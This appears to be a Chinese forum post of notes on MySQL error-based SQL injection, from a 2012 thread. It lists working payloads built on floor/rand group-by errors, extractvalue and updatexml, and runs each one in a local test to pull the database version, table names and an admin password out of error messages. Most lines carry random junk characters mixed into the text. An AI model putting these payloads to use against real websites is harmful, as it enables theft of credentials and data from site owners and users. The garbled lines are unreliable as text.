放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
5 V5 l1 G" d4 y实际测试环境:. \# ~! ]& Q0 i( Z& l
7 Q; I7 D& G# Y N0 D
q; y# c, {4 V# u0 r6 V
mysql> show tables;
% s# s) a3 `* C# r$ ~; U) R9 g+----------------+
# h0 W `: \) @7 u: Y| Tables_in_test |
' Z& H& o! O3 @/ S4 n" z6 X+----------------+
: e# R7 N- W2 S0 `; x* G0 ]# F! m| admin |
8 v" S+ b7 M! U/ W& n# Q& \; g| article |
! v: M4 x* h) R# b( k+----------------+. K4 S A5 _! L$ G
+ f6 S' L- }% m* ?+ d ! L2 v, e4 e! p+ Z- j. g
" [0 q2 U" H& r/ }4 z
mysql> describe admin;4 \+ D% m6 ^+ x% s
+-------+------------------+------+-----+---------+----------------+5 I/ m7 Z" y1 U' R
| Field | Type | Null | Key | Default | Extra |
) q2 L( j K' q+-------+------------------+------+-----+---------+----------------+ {$ E8 {$ d) E8 {9 F4 w; N
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |( T+ k" h% F& N) k
| user | varchar(50) | NO | | NULL | |
- a# z- {! _+ }* U| pass | varchar(50) | NO | | NULL | |
8 D9 b4 b$ l$ [8 i9 U+-------+------------------+------+-----+---------+----------------+3 I9 X% d& s n5 n o6 _
! R M- }- d J* J T( { $ O4 }; l1 @) K
; Q. `" Y4 c# n$ B0 ^mysql> describe article;( H. ]7 z# y6 g4 k1 q3 |" K8 O3 M
+---------+------------------+------+-----+---------+----------------+! W# E& R, X9 n# `+ Q; I
| Field | Type | Null | Key | Default | Extra |$ U+ \$ }( z4 l) x! [1 O
+---------+------------------+------+-----+---------+----------------+) L1 P* g' {& N
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
4 w4 H9 C" D% x2 |6 C, k' v8 k| title | varchar(50) | NO | | NULL | |
* S, ~5 c& o) g; p# b| content | varchar(50) | NO | | NULL | |' q* Q6 S3 J/ C8 v1 c
+---------+------------------+------+-----+---------+----------------+
: E& B$ @; W/ n0 O2 z/ X0 j1、通过floor报错
7 ?9 N% `% C* _ E可以通过如下一些利用代码
3 i2 Z @; f9 E- z( P : I2 l7 {1 @; K5 v X
& \! h7 G! D5 u* K- B2 Pand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
; p' O# X- e/ j, M" cfrom information_schema.tables group by x)a);
: [1 h0 U4 B' r8 U/ O/ f * f& F/ W `$ C6 T* y2 v
0 n8 l l! W4 {9 _9 E0 Land (select count(*) from (select 1 union select null union select !1)x
/ m }9 V+ d' `group by concat((select table_name from information_schema.tables limit 1),. [/ d1 z2 u" X% A
floor(rand(0)*2)));4 K+ K( w$ V% W: x+ O& X
举例如下:
9 a2 V9 j6 E9 Q- n: L0 L$ u首先进行正常查询:. ]* F8 g7 ` a9 X0 [7 D
7 S0 {/ L+ D3 c) s# Z: k( g3 Umysql> select * from article where id = 1;0 S9 h" _2 ^5 o, w- h5 @$ ~
+----+-------+---------+
, y( q! |- C9 Y$ G| id | title | content |
9 f5 h& ?# Q- L' f8 z! h1 i+----+-------+---------+
& e3 M# U1 K2 h9 \( j| 1 | test | do it |
* N$ c0 ^7 T6 v4 R, s0 s* S3 X+----+-------+---------+
7 W# c F @- Y7 }6 j假如id输入存在注入的话,可以通过如下语句进行报错。 C( n: l4 x4 [" R& n$ ^' Q
5 m5 ^* {1 o! U5 ~. e
+ B& E1 Q& g" Q5 n5 gmysql> select * from article where id = 1 and (select 1 from
) n1 m, D r, x6 J3 U(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 ], S9 M! M9 }
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'6 o2 c3 l: R a1 e' O/ X
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
, T/ k. s* W3 C1 a. \例如我们需要查询管理员用户名和密码:
1 q# x+ }: z+ [) U* G# G! \* gMethod1:
8 b7 S2 p0 J% L
% T+ R: B- z0 v4 {$ `1 e6 Q$ r% _) x
7 p. F5 T0 p j1 Lmysql> select * from article where id = 1 and (select 1 from
5 i4 L6 t& v) o6 d$ i(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
% y+ K) T" A. @from information_schema.tables group by x)a);
( B* K$ T6 l1 x9 m1 P( _2 r9 wERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'$ _; C& ` s3 V7 ?
Method2:
% N+ ?* p2 a2 z
s/ \% m$ N* [. i, h
- i5 N& {; Z# c! M+ t) hmysql> select * from article where id = 1 and (select count(*)
& ^8 X$ M, x+ X0 `from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),$ M _8 N0 h- M4 k
floor(rand(0)*2)));
* U+ P8 i/ k3 I$ H" g7 n/ s3 Y# KERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
& W4 h5 m7 v3 M5 B: ]& F2、ExtractValue
. ~5 B" H+ G) h* \) O( A0 S4 p% n测试语句如下
/ _7 o5 m6 k1 |! B% T0 C H- k
+ ?4 T7 _0 c: v! k% O/ l
" l+ S+ i6 i5 j7 ]7 A8 c, u- a; |and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
) B3 a: d8 V) T! s4 V实际测试过程
6 [5 s9 L0 p& G# Y* O& ~" l
- j1 V1 P+ _; t # O9 [$ e S- f3 T; z( P( z5 Q
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
& A/ n; ~& s' R, B+ W, G(select pass from admin limit 1)));--
. r4 a, b5 i& p$ R& L# E5 M7 ^ERROR 1105 (HY000): XPATH syntax error: '\admin888', ]" d9 E$ x, {1 F( [2 E+ g
3、UpdateXml
6 G9 {! d2 l; x2 e& ~5 T" M$ d测试语句
5 ]& t* q' S/ B ; I2 P2 N9 S" l3 o1 h) T1 j
% S! U, v! y% H! d- z. r; G
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
1 Q( f( u! M5 {) v6 p# L. [: C实际测试过程
7 ?" @7 Y& j0 U3 P2 G
1 _8 ~" d" \2 e h' W. `
) T, i3 i `* k& [mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
5 B* E% T7 d, t) K(select pass from admin limit 1),0x5e24),1));% q+ z7 d% c: w
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
$ R5 h' x. _% ^1 S' \, n9 Q4 vAll, thanks foreign guys.
* {/ @+ \3 Q. F! v$ Y+ O( J* M 8 K8 ^ [9 ]8 b. M$ ?7 j% d# v
7 P% F% v' x) h
|
发表于 2012-12-10 10:28:51
收藏
支持
反对